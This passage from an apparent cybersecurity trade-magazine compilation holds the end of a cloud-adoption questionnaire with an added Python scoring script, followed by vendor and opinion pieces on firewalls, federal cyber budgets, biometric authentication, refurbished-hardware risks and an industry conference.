5 | Is the cloud service appropriate for handling the business needs? This is an important question, but the business has to understand the operation and functionality of the service provided by the cloud service provider. | No | 1,8
6 | Is the cloud service suitable for efficiently implementing the organization's cost allocation? Many organizations have a cost allocation system; if the cloud cannot handle these needs, the answer is no. | No | 2
7 | Do the IT experts possess the specific knowledge needed to operate cloud services? Many cloud trainings are available if the IT staff require further education, so this part of the introduction is manageable. | No | 1,7
8 | Are there any legal or other legislative obligations that can limit the use of cloud services? If yes, the organization has to take the legislative requirements into account. | Yes | 2
9 | Is the data migration relatively easy and securely feasible? If not, you can establish a full fallback plan, or other plans in case problems appear. | No | 1,8
10 | Is the cloud solution compatible with the organization's architecture elements? If not, handling this will be more expensive. | No | 1,9
11 | Is it possible to establish an exit strategy (in the case of a unique cloud solution)? Establishing a good exit strategy is very complicated; there are many possible scenarios the organization cannot anticipate. | No | 1,9
12 | Could the service implementation costs be lower than the operational costs of the on-premises solution? Exact amounts are required to answer properly. | No | 2
13 | Does the cloud service need further development, or is it available as a compact service? | Developing / No | 1,8
14 | Can the cloud service's technical implementation be considered risky (interfaces, encryption, etc.)? With the help of a qualified risk management team, the risk mitigation process will cover all difficulties. | Yes | 1,7
15 | Do the cloud provider and the service hold relevant certificates? Without certification, you have to make sure the service complies with your information security and data protection standards by conducting an audit. | No | 1,7
16 | Does the reporting function of the cloud service support the decision-making process? It is important for managers but not directly relevant for operators. If the answer is no, you have to find a workaround to handle the problem. | No | 1,5
17 | Has the cloud service provider you want to deploy recently published an incident? It is a good indicator if the provider publishes incidents, but consider what the incident was and what kind of failure could have caused it. | Yes | 1,6
18 | Could managing the cloud service take more time than operating an on-premises system? More estimated time means more money. | Yes | 1,8
19 | Will the use of the cloud service be based on a contract, or placed under general terms and conditions? If it is based on a contract, the answer is yes, and you have the possibility to include individual needs in the contract. | No | 1,6
Aggregated scores | | |
The methodology presented above supports the pre-implementation assessment process by providing a
way to analyze the advantages and disadvantages of cloud service implementation. In practice, many
organization-specific situations can occur that cannot be divided along the lines of a yes/no answer. If
such a situation arises, it is advisable to collect the arguments from both sides.
To utilize the methodology in the best way possible, it is crucial to determine the scores in advance of
answering the questionnaire. If the aggregated scores come out equal at the end of the analysis, the
decision makers can rely on the individual results and debates of each question above.
I hope this methodology can help to make the right decision!
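The scoring procedure above, as an added Python example (not from the article or from Black Cell): it encodes the 19 questions with the table's recommended scores and disadvantage answers, totals each side, reports a question that cannot be settled by yes/no as undecided so arguments can be collected for both sides, and lets an organization override the recommended scores. The shortened question texts, the use of "Developing" as the disadvantage answer for question 13, and the answer validation are my assumptions.

```python
from dataclasses import dataclass, field
from decimal import Decimal
from typing import Dict, List, Optional, Set


def parse_score(text: str) -> Decimal:
    """The article writes scores with a decimal comma ("1,9"); Decimal keeps them exact."""
    return Decimal(text.replace(",", "."))


@dataclass(frozen=True)
class Question:
    number: int
    text: str                 # shortened paraphrase of the article's question
    disadvantage_answer: str  # the answer that counts on the disadvantage side
    score: Decimal            # recommended weight from the table (may be overridden)


# Scores and disadvantage answers as given in the article's table.
QUESTIONS: List[Question] = [
    Question(1, "Is management committed to using cloud services?", "No", parse_score("2")),
    Question(2, "Can the organizational cloud usage rules be implemented easily?", "No", parse_score("1,9")),
    Question(3, "Does the information security policy allow cloud services?", "No", parse_score("1,5")),
    Question(4, "Does an unchangeable contract prohibit the cloud service?", "Yes", parse_score("1,9")),
    Question(5, "Is the cloud service appropriate for the business needs?", "No", parse_score("1,8")),
    Question(6, "Does the service support the organization's cost allocation?", "No", parse_score("2")),
    Question(7, "Do the IT experts have the knowledge to operate the service?", "No", parse_score("1,7")),
    Question(8, "Do legal or legislative obligations limit cloud usage?", "Yes", parse_score("2")),
    Question(9, "Is data migration relatively easy and securely feasible?", "No", parse_score("1,8")),
    Question(10, "Is the solution compatible with the organizational architecture?", "No", parse_score("1,9")),
    Question(11, "Is it possible to establish an exit strategy?", "No", parse_score("1,9")),
    Question(12, "Could implementation cost less than on-premises operation?", "No", parse_score("2")),
    # Assumption: the table lists "Developing" as the disadvantage answer for question 13.
    Question(13, "Is the service compact, or does it need further development?", "Developing", parse_score("1,8")),
    Question(14, "Is the technical implementation risky (interfaces, encryption)?", "Yes", parse_score("1,7")),
    Question(15, "Do the provider and service hold relevant certifications?", "No", parse_score("1,7")),
    Question(16, "Does the reporting function support decision making?", "No", parse_score("1,5")),
    Question(17, "Has the provider recently published an incident?", "Yes", parse_score("1,6")),
    Question(18, "Could managing the service take more time than on-premises?", "Yes", parse_score("1,8")),
    Question(19, "Will usage be based on an individual contract?", "No", parse_score("1,6")),
]


def valid_answers(q: Question) -> Set[str]:
    """Question 13 is answered Developing/Compact, every other question Yes/No (assumption)."""
    return {"developing", "compact"} if q.number == 13 else {"yes", "no"}


@dataclass
class Result:
    advantage: Decimal = Decimal(0)
    disadvantage: Decimal = Decimal(0)
    undecided: List[int] = field(default_factory=list)  # questions still to be argued out

    @property
    def outcome(self) -> str:
        """Which side the aggregated scores favour; a tie sends the decision back to debate."""
        if self.undecided:
            return "incomplete"
        if self.advantage > self.disadvantage:
            return "advantage"
        if self.disadvantage > self.advantage:
            return "disadvantage"
        return "tie"


def evaluate(answers: Dict[int, Optional[str]],
             overrides: Optional[Dict[int, str]] = None) -> Result:
    """Aggregate the advantage and disadvantage sides of the questionnaire.

    answers maps question number -> answer; None or a missing entry marks a
    situation that cannot be split along a yes/no line and is reported as undecided.
    overrides maps question number -> replacement score (written as in the table, e.g. "2,5"),
    since the article says the recommended scores may be changed by the organization.
    """
    overrides = overrides or {}
    result = Result()
    for q in QUESTIONS:
        score = parse_score(overrides[q.number]) if q.number in overrides else q.score
        answer = answers.get(q.number)
        if answer is None:
            result.undecided.append(q.number)
            continue
        normalized = answer.strip().lower()
        if normalized not in valid_answers(q):
            raise ValueError(f"question {q.number}: unexpected answer {answer!r}")
        if normalized == q.disadvantage_answer.lower():
            result.disadvantage += score
        else:
            result.advantage += score
    return result


if __name__ == "__main__":
    # Constructed sample: five questions answered, the rest still open for debate.
    sample = {1: "Yes", 4: "Yes", 8: "No", 11: "No", 13: "Developing"}
    r = evaluate(sample)
    print(f"advantage={r.advantage} disadvantage={r.disadvantage} "
          f"undecided={r.undecided} outcome={r.outcome}")
```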
About the Author
Zsolt Baranya is an Information Security Auditor and head of
compliance at Black Cell Ltd. in Hungary. Formerly, he held information security officer and data
protection officer roles at a local governmental organization. He also worked as a senior desk officer at
National Directorate General for Disaster Management, Department
for Critical Infrastructure Coordination, where he was responsible for
the Hungarian critical infrastructures’ information security compliance.
Zsolt can be reached at zsolt.baranya@blackcell.io and at his
company’s website https://blackcell.io/
Reshape Security and Embrace Cyber
Resilience with Hillstone Networks
By Timothy Liu, CTO & Co-founder, Hillstone Networks
Hillstone is a leader in infrastructure protection. We offer a trusted and cost-effective unified platform for
end-to-end visibility, intelligence, and control. In a post-breach world where enterprise security is being
reshaped by the reality that attacks and security compromises are a matter of “when” and not “if,” Hillstone
can help customers achieve cyber resilience by detecting and isolating attacks and facilitating rapid
recovery. Hillstone’s comprehensive security suite addresses emerging threats and serves to mitigate
enterprise-wide risks while supporting mobility and work-from-anywhere initiatives.
Our approach, proven at over 23,000 enterprises worldwide, helps CISOs and security teams meet the
challenges of:
An evolving threat landscape - Hillstone’s integrated network detection and response (NDR)
and extended detection and response (XDR) platforms tie together internal observations and
alerts with external threat intelligence to create a holistic and comprehensive view of an
organization's evolving attack surface and security posture, enabling deeper insight and
increased ability to spot hard-to-locate and sophisticated multi-layer, multi-stage attacks.
Rapid infrastructure expansion - Hillstone offers complete protection across branch locations,
employee homes, campus networks, and cloud data centers. Edge protection suites, including
software-defined wide area networking (SD-WAN) and zero-trust network access (ZTNA),
complement our industry-leading next-generation firewalls (NGFW). Hillstone’s cloud workload
protection platform (CWPP) extends across virtual machines (VMs), containers, and serverless
application infrastructure, covering today’s and tomorrow’s enterprise workloads.
Growing regulations and compliance demands - Increasing security and compliance
mandates can be met through Hillstone’s extensive solutions that serve any location, protect any
platform, and any application hosted anywhere. Manage security risks within enterprises with
complete user, application, and device visibility to see everything regardless of location.
Limited budgets, talent recruitment challenges - Hillstone’s comprehensive solution suites,
augmented with AI/ML and threat feeds, can deploy and scale access controls and visibility into
today's dynamic datacenters, applications, clouds, and mobility architectures. The accuracy of
our solutions and ability to correlate across multiple data sources helps reduce alert fatigue and
threat paralysis, enabling higher productivity and increased job satisfaction for overworked
security personnel. Our integrated solution reduces the overhead of managing multiple
management systems from disparate vendors, improving productivity and reducing burden on
security teams while improving total-cost-of-ownership.
By creating our solutions with the methodology of “see, understand, act”, we place a concerted effort on
showing security teams how we are transitioning their security toward cyber-resiliency. We want them to
be able to feel the impact and feel like they have a grasp of what’s happening. Examples of this can be
seen in both our inclusion in Gartner Peer Insights and our classification as a Visionary in Gartner’s
Magic Quadrant for Network Firewalls. The visionary qualification shows we have security that works
from a legitimacy and analytical perspective. Our Peer Insights qualification shows we have security
products that function simply and easily for security teams around the world.
About the Author
Timothy Liu is Co-Founder and Chief Technology Officer of
Hillstone Networks. In his role, Mr. Liu is responsible for the
company’s product strategy and technology direction, as well
as global marketing and sales. Mr. Liu is a veteran of the
technology and security industry with over 25 years of
experience. Prior to founding Hillstone, he managed the
development of VPN subsystems for ScreenOS at NetScreen
Technologies, and Juniper Networks following its NetScreen
acquisition. Mr. Liu is also a co-architect of the patented
Juniper Universal Access Control and holds an additional
patent on Risk Scoring and Risk-Based Access Control for
NGFW. In his career, Mr. Liu has served in key R&D positions
at Intel, Silvan Networks, Enfashion and Convex Computer. Mr. Liu holds a Bachelor of Science from the
University of Science and Technology of China and a Ph.D. from the University of Texas at Austin.
Tim can be reached online at @thetimliu and at our company website https://www.hillstonenet.com/
Moving Beyond Budget Battles: The Real Secret to Improving National Cyber Defenses
By Teddra Burgess, SVP, Public Sector, Tanium
There's been no shortage of criticism around President Biden’s new $773 billion defense budget. That’s
no surprise, as federal budgets always draw attention and provide ample opportunity for political
posturing and finger-pointing regardless of the actual figures involved.
Numbers aside, when it comes to America's cyber defense, we should do our best to put partisanship on
the shelf and seek multilateral ways to ensure our cybersecurity is strong and resilient.
Such concern extends far beyond the federal government: Ransomware and other criminal cyberattacks
against targets like K-12 schools, municipalities, universities, and every conceivable private-sector
industry are all on the rise, so we’re not faced solely with nation-state cyber warfare. In fact, criminal
gangs have been waging war on consumer data and personally identifiable information (PII) for some
time now. During the pandemic, threat actors took advantage of our increased vulnerability through global
supply chains by ramping up threats and expanding attack vectors, which we believe will continue to
climb throughout 2022.
The war in Ukraine has catalyzed interest in cyber readiness. But even those of us who have been
preparing for cyber war over the last several decades are now reevaluating our toolkits to ensure
complete preparedness should we need to engage in a full-scale cyber conflict. Cyber warfare may be a
relatively new type of war but preparing for it should be no less urgent than preparing for physical combat.
To do that, there are four major components of cyber preparedness that government agencies and
military branches should address: intention, cyber hygiene, controls, and people.
Why Intention Matters
When Dwight Eisenhower gave his landmark speech on the dangers of the military industrial complex,
he spoke of the need to find agreement on contentious issues and to exercise good judgement by striving
for balance and seeking progress. He astutely remarked that the lack of good judgement eventually leads
to imbalance and, unsurprisingly, frustration, a sentiment that’s all too familiar to modern-day chief
information security officers (CISOs) charged with keeping their organizations, whether public or
private, secure in the face of shifting attack vectors.
The past two decades have given rise to a thriving cybersecurity industrial complex not unlike
Eisenhower’s military one. Yet despite the Hydra-like growth of security vendors, the thousands of new
capabilities that purport to control for risk levels, and the attendant rise in spending on security-related
products and services, attack vectors keep growing. As they grow, they contribute to often unnecessary
spending to maintain an already costly security infrastructure.
As a result, it’s important to rethink and retool the solutions we have and the approaches we use to better
understand what our current security investments are delivering, whether their results are still relevant,
and what gaps still exist. Do we have proper controls in place? Can we scale in real or near-real time to
meet challenges as they surface? Are our existing tools truly delivering on their promises? At the end of
the day, it’s crucial that organizations think through and continuously assess their tech stack or they’ll
find they’re not only wasting budget, but risking much more.
We're behind in some areas and can do better; we are not as prepared globally as we might be. But we
do have strong cybersecurity leadership and the right intentions to meet today’s challenges. Attacks today
are more complex, layered, and targeted. Threat actors have shut down meat packing plants, disrupted
critical infrastructure, and ransacked government agencies. We’re now also facing the implications of
nation-state cyberattacks; the potential disruption of satellites and communications systems, of utilities
like water, oil, and electricity. There are threats to physical and cyber defenses as well as the potential
onslaught of misinformation campaigns designed to cause chaos and confusion. Nothing is off the table:
Attackers will strike wherever it hurts us the most.
President Biden’s budget proposal is a step in the right direction, but debate continues around whether
it’s big enough and where the dollars are going. That’s where intention gives way to results.
Getting back to basics
Hackers don’t need brute-force tactics to break into network and data assets: they can, and often do,
log in with stolen or compromised credentials. They exploit weaknesses in third-party software. They even
con employees into doing the dirty work for them. Government agencies are rightly focused on decreasing
these risks, reducing technology complexity, achieving better compliance, and doing whatever else it
takes to prevent sensitive data breaches.
But that’s not enough. Agencies must first understand what lives in their own environments: What are
their IT assets? How many devices connect to their agency? How many servers? What’s on the network?
What’s in the cloud? What tools are configured on devices and other endpoints? Are the tools configured
correctly? Can they see absolutely everything in their environments and make real-time changes with up-
to-the-second data?
If there’s even a whiff of uncertainty about the number of assets or the software that runs on them, tech
leaders must perform a comprehensive risk assessment. There’s no way to protect what you don’t know
you have, so teams must inventory and validate all IT and security assets.
It may help to keep in mind that 79 percent of organizations recently surveyed report widening visibility
gaps in their cloud infrastructure, while 75 percent found the same problem across end-user and IoT
devices. Similar gaps exist across federal, state, and local agencies, making it imperative for them to
know their assets intimately, including every piece of software that runs on them at any given point in
time.
After an agency has absolute clarity into its assets, the next step is to secure all its endpoints, whether
laptops, PCs, or virtual machines in the cloud, using prevention-first solutions. If agencies approach
cybersecurity like much of the private sector does, focusing on detecting and responding to threats, or
trying to overcome basic deficiencies with tools, they will not keep their endpoints or their data secure.
An ounce of prevention is worth a pound of cure.
The final step, after an agency has identified and inventoried all its assets, is to continuously maintain a
clean, secure environment, and that means creating a process for updating software and deciding
who’s responsible for installing patches, for running vulnerability scans, and for determining how issues,
once discovered, are remediated.
There are an average of 50 common vulnerabilities and exposures discovered every day. Software
developers are constantly updating their code, which means that annual or even quarterly scans of
patches and updates just won’t cut it. Daily scanning won’t get the job done either, because a single scan
will miss the 49 others that surface every 24 hours. Agencies must continually seek out and identify blind
spots to stay genuinely protected.
Compliance fails without proper controls
Mastering the basics of cyber hygiene boosts resilience across the board. When agencies get into the
habit of thinking that adhering to compliance standards alone provides security, they lose their cyber
resilience.
To ensure resilience, agencies must establish controls in addition to compliance standards, while cyber
hygiene must include vulnerability patching, comprehensive asset management, user education, email
protections, and improving password habits. As the post-mortem of every breach shows, human error
almost always plays a role. Even compliance standards can't eliminate people from the equation. If
compliance alone can’t prevent an attack, it can’t be an agency’s security strategy either.
The good news is there's clear guidance for agencies looking for direction on exactly what controls to put
in place. From the National Institute of Standards and Technology (NIST) to the Department of Homeland
Security’s (DHS) Cybersecurity and Infrastructure Security Agency (CISA), there are countless free
resources for those seeking best practices, tools, and frameworks to set them on a path to success.
To succeed in cybersecurity, diversify the team
With all our many shortcomings, humans remain a critical component in the defense against threat actors.
As the cyber landscape evolves, IT and security teams must also evolve. Cybersecurity teams must use
creative problem solving and diverse ideas and tactics to meet emerging threats. Unfortunately, limited
viewpoints create a barrier to a team’s ability to mitigate and respond to attacks comprehensively.
Teams are stronger when they leverage the power of their similarities as well as their differences.
Problem solving, strategic planning, and innovation all benefit from diversity and inclusion. Importantly,
diversity drives innovation. As Dr. Telle Whitney, a computer scientist and pioneer on the issue of women
in technology, said, “When we limit who can contribute, we in turn limit what problems we can
solve.” Wise words that point to a fundamental challenge we’re now facing, one that can and must be
solved if we don’t wish to stifle innovation.
Gender diversity has proven critical for organizations of all types across decision-making, problem
solving, and collaboration. Gender-diverse companies are 21 percent more likely to have above-average
profitability, and companies employing an equal number of men and women manage to deliver up to 41
percent higher revenue. Diverse teams are 87 percent better decision-makers than individuals. Research
suggests that gender diversity efforts could boost the global GDP by $28 trillion if the global workforce
became equally gender-diverse by 2025.
Budgets only matter as much as the intentions behind them. Republicans and democrats can debate line
items for months to come, but that would be wasted time when we consider our current cyber threat
landscape. We have the right tools at our fingertips to improve public sector cyber preparedness; it’s
just a matter of getting those tools in the hands of the right people and putting the controls in place to
ensure they don’t fail. President Biden was right on at least one point: “We need everyone to do their part
to meet one of the defining threats of our time.” Our vigilance and urgency today can prevent or at least
lessen the severity of attacks tomorrow.
About the Author
Teddra Burgess is the Senior Vice President, Public Sector
at Tanium, and is a seasoned expert with over two decades
of broad industry expertise. Over the course of her career,
Teddra has been instrumental to the success of several high-
profile technology companies including Hewlett Packard,
Micro Focus International, CA Technologies, SAI Global, and
ASG Technologies where she served as VP of Northeast and
US Federal Sales.
An advocate for advancing women+ and people of color in
technology, Teddra joined Pipeline Angels, an organization
changing the face of angel investing by creating capital for
women+ founders, as an independent investor in 2019. In
2020, she earned an Executive Certificate in DE&I from Cornell University, and is active in a variety of
community and professional organizations including Women in Technology, AFCEA, the NAACP and
Mocha Moms, Inc. She is also a member of Delta Sigma Theta Sorority, Inc.
Teddra can be reached online at Email: tanium@highwirepr.com, Twitter: @teddratburgess, LinkedIn:
https://www.linkedin.com/in/teddrathomasburgess/ and at our company website http://www.tanium.com/.
Continuous Biometric Authentication Tool
Against Account Takeovers
Introducing Graboxy Sentinel
By Tamas Zelczer, CEO, Cursor Insight
Twenty years ago, it was much more likely to have your identity stolen out in the physical world, but today
it happens online. Account takeover (ATO) attacks have been surging dramatically in recent years as
cybercriminals sharpen their skills and become increasingly sophisticated in their techniques.
In 2020, in a world thrown into remote work, attempted fraudulent logins increased by 282%. The situation
has only become worse since then. According to the Identity Theft Resource Center's annual report, data
breaches rose by 68% in 2021 and 36% of businesses have experienced a security incident
because of remote workers' actions.
One of the most effective strategies to protect your business from corporate account takeover attacks is
to enhance your authentication process. Stolen credentials become useless when hackers are confronted
with authentication prompts that they are unable to pass.
Traditional authentication techniques are easily outsmarted by cybercriminals, making those inadequate
for robust fraud prevention. Organizations should start thinking more strategically about protecting their
sensitive data and critical systems. They also need to choose a sustainable and adaptive cybersecurity
solution that will work both now and in the future.
One-time authentication methods only provide security at given times. Deploying 2FA or MFA during
login will make it more secure. Usually, additional authentication is required for certain high-risk activities
like initiating a bank transfer, paying with a card, or getting access to sensitive corporate data.
Furthermore, one-time authentication techniques are easy to hack, and once the cybercriminal has
access, there is nothing to stop them.
Continuous authentication, on the other hand, runs in the background and does not require any extra
input from the user. It simply observes the user's behavior and activity while applying advanced
evaluation methods to identify them at a high frequency.
This means that authentication becomes a continuous process: anything the user does is an invisible
authentication challenge itself. Mouse movement dynamics, keystroke dynamics, and the user's digital
fingerprint (IP address, browser version, etc.) can all be used for continuous authentication.
Most behavioral biometric authentication systems are based on machine learning models. This allows
them to enhance the accuracy of authentication over time. The longer they can record data, i.e. monitor
user behavior, the more accurately they can recognize features and unique user traits, and the more
accurate the authentication will become.
Cursor Insight Ltd.'s Graboxy Sentinel is a new product that provides continuous biometric authentication
and protects enterprises from corporate account takeovers. It uses the company’s proprietary AI
technology to learn and analyze the users’ cursor movements, which are just as unique as handwriting.
If the real-time cursor movement analysis shows a divergence from the user’s biometric profile, Graboxy
Sentinel flags the fraudulent user accessing the account. Flagged users can be locked out or re-verified
using traditional multi-factor authentication methods.
https://vimeo.com/694347500
Graboxy Sentinel is a versatile cybersecurity tool and can be used with enterprise accounts, home offices
for remote work, or online banking and payment services.
We’re not suggesting you should completely throw away all your existing authentication methods. One-
time authentication should be used for login. But passwords alone are rarely enough. It’s worth adding
2FA or MFA for more safety. To maximize your security level, continuous authentication should be
deployed in the background during the user session. This combination of authentication techniques will
protect you against account takeover attacks.
For more information about continuous authentication and Graboxy Sentinel, visit sentinel.graboxy.com.
About the Author
Tamas Zelczer is the CEO of the Cursor Insight. Tamas can be
reached online at tamas@cursorinsight.com and at our company
website https://sentinel.graboxy.com/.
A Guide to Mitigating the Cyber Risks Posed by Refurbished Hardware
An insight into the cyber risks that are potentially posed when investing in refurbished
hardware, and an insight into how these potential risks can be prevented and/or tackled.
By Eloïse Tobler MSc, Ecommerce Supervisor, Wisetek
More businesses than ever before are rethinking their approach to hardware acquisition. As carbon
footprints become more of a concern, an increasing number of businesses are thinking twice about buying
new hardware directly from manufacturers. Hardware retention also remains a sore point, with as many
as 59% of companies thought to throw out equipment before it reaches the end of its operational life.
Making a saving on pre-owned hardware isn't just cost-effective, it's also far better for the environment.
However, refurbished hardware presents specific cyber risks that need to be considered. Read on as we
explore these in more detail, along with an outline of the steps you can take to mitigate them.
What Security Risks Need to Be Considered?
You may be able to make considerable savings by purchasing refurbished hardware, but there are
several major risks involved that leave you open to cyberattacks and data breaches.
Deleted Files
Traces of a file can remain on a device long after it has been deleted. Although the file itself may no
longer be present in its original location, traces of it will remain elsewhere in the system. If these files
contain harmful malware, you're at constant risk of cyberattacks. If these files were installed onto a device
intentionally, these risks can be unleashed the moment you start using refurbished hardware.
Keystroke Logging and Malware
Keylogging software is one of the most nefarious tools used by cybercriminals. Keyloggers are highly
effective at keeping track of your activities. These activity-monitoring programs allow hackers to access
a wealth of personal information. This can include usernames and passwords, payment information, as
well as your general browsing history. Unless you're actively looking for such software, its presence will
go undetected. By the time you realize there's an issue, sensitive data will be in the hands of the individual
who installed the keylogging software.
Malware is even more difficult to deal with. As with keystroke-logging software, malware can monitor
activities like internet browsing. It may also install additional software or cookies onto your device without
your knowledge. In the worst-case scenario, malware can mine your hard drive for specific pieces of
information. Some malware can even access microphones and webcams, presenting a significant security risk.
Cryptojacking Attacks
Mining for cryptocurrency requires considerable processing power, making it an infeasible venture for
many. It probably comes as no surprise that the crypto boom has brought with it unique cyber risks. If
you've recently purchased refurbished hardware, cryptojacking is something you should be looking out
for.
In short, criminals piggyback onto the processing power of your hardware and its electrical consumption
by installing malware on a device that mines for cryptocurrency. You might think this an unlikely scenario,
but in the first half of 2021, more than 51 million such attacks were detected. This is a marked increase
in attacks detected in 2020.
As with other types of malware, crypto mining software can be hard to detect and largely goes unnoticed.
However, if your device is running noticeably slowly, it could be a sign that your hardware
has been compromised with crypto mining software.
How to Combat Cyber Risks with Refurbished Hardware
All of this might make for scary reading, but there are many steps you can take to mitigate risks when
using refurbished hardware. Many of these are easy to implement yourself.
Clearing Hard Drives
For starters, make sure the hard drive of a newly acquired piece of hardware has been wiped clean. Even
if a reseller has given you assurances that a hard drive has been wiped, there's no guarantee. The peace
of mind involved in carrying out a second hard drive wipe is priceless. Many data removal tools are readily
available precisely for this purpose. A full wipe will remove all files from a hard drive, as well as annihilate
any lingering data.
For maximum reassurance, you may decide to replace a hard drive entirely. However, when purchasing
replacement hard drives, it's vital you procure one from a trusted manufacturer. For newer hardware,
finding an affordable replacement should prove simple enough. However, if your refurbished devices are
no longer in production, you may struggle to find a suitable replacement.
Carry Out a BIOS Check and Update
Protecting the BIOS of a computer is crucial when it comes to cybersecurity. Without the BIOS, your
hardware can't function. Even if the hardware has been updated before being delivered to you, it's
important to install the most current version.
It's also worth investigating prospective hardware models ahead of purchasing them. Some devices are
more susceptible to BIOS attacks than others. Recently, it was discovered that as many as 30 million
Dell devices were at high risk of remote BIOS attacks from cybercriminals.
Cybersecurity Checklist for Refurbished Hardware
All of the above requires effort on your part. However, you can alleviate in-house pressures and concerns
about cybersecurity risks with due diligence before you buy. Carrying out a few basic checks before
making a payment will dramatically reduce the time and money you need to invest in mitigating
cybersecurity risks.
Only Buy from Certified Sellers
When you're eager to make a saving, it can be tempting to buy refurbished hardware from third-party
marketplaces. While these platforms do yield considerable savings, you're less protected when it comes
to warranties and refunds. In many cases, there's no guarantee that refurbished hardware has been
tested to ensure it's in full working order. If you must buy from one of these online marketplaces, only
purchase from legitimate sellers. The likes of eBay offer refurbished programs that only pre-qualified
vendors can use to sell goods. If you're buying refurbished hardware elsewhere, always check to see if
a vendor has original equipment manufacturer (OEM) certification.
Understand the Difference Between Refurbished and Recertified Hardware
This is important as far as warranties are concerned. Although the two terms are used interchangeably,
refurbished and recertified don't mean the same thing. The main difference here is the warranty attached
to the hardware. Refurbished products tend to include no warranties at all, meaning you have no buyer
protection. If the hardware doesn't perform as expected, you may find yourself having to swallow the
cost.
However, recertified products will come with at least a short-term warranty included. Regardless of what
banner a product is being sold under, read the fine print before finalizing a purchase. You'll want as long
a warranty as possible. If a product has been recertified, it should mean you're entitled to ongoing support
from the original manufacturer.
In Summary
Choosing refurbished hardware isn't just cost-effective, it's an easy way of ensuring your operation is as
sustainable as possible. However, cost savings and improved green credentials also leave you open to
cybersecurity risks that can't be ignored.
If you plan on using refurbished hardware, be vigilant when it comes to deleted files and software that
might still be lurking under the surface. Keystroke logging software and malware can be devastating to
your organization if not detected early enough. You also need to be aware of cryptojacking and other
emerging cybercrime trends.
Fortunately, mitigating cybersecurity risks is fairly effortless. Once your refurbished hardware has arrived,
ensure your IT teams wipe hard drives clean. Do this even if a seller has told you this has been taken
care of. When in doubt, absorb the cost of replacing hard drives entirely.
To make life easier, express caution before you buy. Only purchase refurbished hardware from certified
sellers and be extra vigilant when buying devices from third-party marketplaces. You'll also need to have
a handle on how refurbished hardware deviates from recertified hardware. Only certified hardware will
give you the luxury of extended warranties and continued support from the original manufacturer.
About the Author
Eloïse Tobler is the Ecommerce Supervisor of the Wisetek Store, which
was created to give customers access to high quality, reliable and
affordable refurbished devices, to an “as new” standard. Wisetek Store is
part of the greater Wisetek group, with over 14 years’ experience in the
industry, supporting some of the world’s largest IT companies with their
used and excess IT equipment. Wisetek also operates a strict Zero-
Landfill policy and are committed to the principles of the Circular
Economy.
Eloïse can be reached online at linkedin.com/in/eloisetobler and at our
company website https://www.wisetekstore.com/.
Acquiring Actionable Knowledge Through
Collaboration
Why sharing experiences is critical to the success of cybersecurity
By Nicole Mills, Exhibition Director, Infosecurity Group
The world is quickly waking up to the true threat of cybercrime.
Cyber incidents topped Allianz’s latest Risk Barometer for only the second time in the survey’s history,
with ransomware attacks, data breaches and major IT outages worrying organisations even more than
business and supply chain disruption, natural disasters, and the COVID-19 pandemic.
Gartner shares similar insight, identifying the threat of new ransomware models as the top concern facing
firms in its Emerging Risks Monitor Report released in the third quarter of 2021, while the European Union
Agency for Cybersecurity (ENISA) has named the present day as the “golden era of ransomware”.
The consensus is unanimous. Right now, cybercrime is rampant, and 2022 will be a critical year for firms
in turning this increasingly dangerous tide. It is fair to say, achieving this will be easier said than done.
On an individual basis, organisations can acquire more tools, technologies and skills in order to reinforce
their defences. However, without a sound understanding of the threats of the modern day, such
investments may risk being either low in impact or redundant.
It is for this reason that conversations are required.
Cybersecurity is a dynamic discipline, and the opportunity to learn directly from those with real-world
experience of overcoming challenges and managing high pressure situations is not to be missed.
Every single individual in this industry has a different background, knowledge and expertise covering a
phenomenal range of topics, from personal resilience to geopolitics on a global scale. Perhaps our
greatest attribute lies in the fact that we’re a collective of diverse thinkers, yet this thinking cannot and
should not be siloed.
The sharing of knowledge and experiences is vital to inspiring and enlightening, providing actionable
knowledge and fresh ideas to innovate effectively.
Different perspectives provide opportunities
As Exhibition Director of Infosecurity Group, I am in the privileged position of being able to gauge the
thoughts and experiences of some of our industry's brightest minds, each of whom has a different
experience and story to tell.
Events such as Infosecurity Europe, which will take place from Tuesday 21 to Thursday 23 June 2022 at
ExCeL London, provide an opportunity for such specialists to come together and discuss critical topics
of the moment, something that will be particularly relevant for 2022 given the current threat landscape.
The pandemic placed renewed importance on collaboration, deemed critical in sustaining the productivity
and morale of suddenly remote teams. Yet organisations are equally beginning to wake up to the need
to look outside their own four walls.
Government professionals will have different perspectives to thinktanks, who will have different
perspectives to industry executives, and so on. It is why I anticipate a host of different discussions taking
place at such events over the course of this year.
I’ll use Infosecurity Europe as an example. Here, Baroness Eliza Manningham-Buller, the former Head
of MI5 now serving on the Lords Select Committee on Science and Technology, has opted to talk about
Leadership in an Age of Uncertainty, discussing the qualities needed to face so many threats in the world
today. Meanwhile, James Lyne, CEO of Helical Levity, will be looking at how Hacking Really Works,
discussing how cyber criminals operate in the real world and providing hands-on demonstrations of
attacks.
Both are equally important topics, yet both are perhaps entirely alien to the other.
Another example can be found in Misha Glenny’s participation. An author, journalist and specialist in
organised crime and cybersecurity who has acted as a consultant to European governments and the EU
on the Balkans, and advised the US Departments of State and of Justice on US-European relationships,
he will be offering insights into the challenges geopolitical tensions are creating across the tech sector.
Meanwhile, Professor Keith Martin, a Professor of Information Security at Royal Holloway, University of
London, and Director of the EPSRC Centre for Doctoral Training in Cyber Security for the Everyday,
will explain how cryptography is used today, highlighting the security benefits and pain points.
Of course, there are many ways in which we can foster greater industry collaboration, this event being
just one such example. Be it face to face conversations, webinars that encourage open debate or other
means of promoting discussion, greater cooperation of all kinds will be critical to ensuring that
cybersecurity teams are able to bridge the ever-growing gap with cybercrime.
From key threats, security-first cultures and new models such as ransomware-as-a-service to the historic
and changing approaches of cybercriminals, third party risks and improving detection of known and
unknown threats, we operate in a sphere that truly feels like it is boundless.
Indeed, there will always be more that we can learn and such learnings, cultivated by the sharing of
knowledge and experiences, will be critical to ensuring that current and future generations of security
leaders can begin to mount a fightback.
About the Author
Nicole Mills, Exhibition Director, Infosecurity Group, RX
Global. Nicole Mills is Exhibition Director for the Infosecurity
Group. With over 20 years’ experience in events and media,
she has worked with many brands responsible for strategic
and commercial growth. Nicole has worked on the
Infosecurity Group for six years working with the Infosec team
responsible for Infosecurity Europe and Infosecurity
Magazine. Working with the team, the aim is to bring the cyber
community together to showcase the latest products and
solutions to enable businesses to continue to protect
themselves.
Nicole can be reached online at @Infosecurity and at our
company website Infosecurity Europe | Information and Cyber Security Expo UK
Darkweb Monitoring
An Indispensable Element of Cyber Risk Management Strategy
By Kaustubh Medhe, Head of Research and Intelligence, Cyble
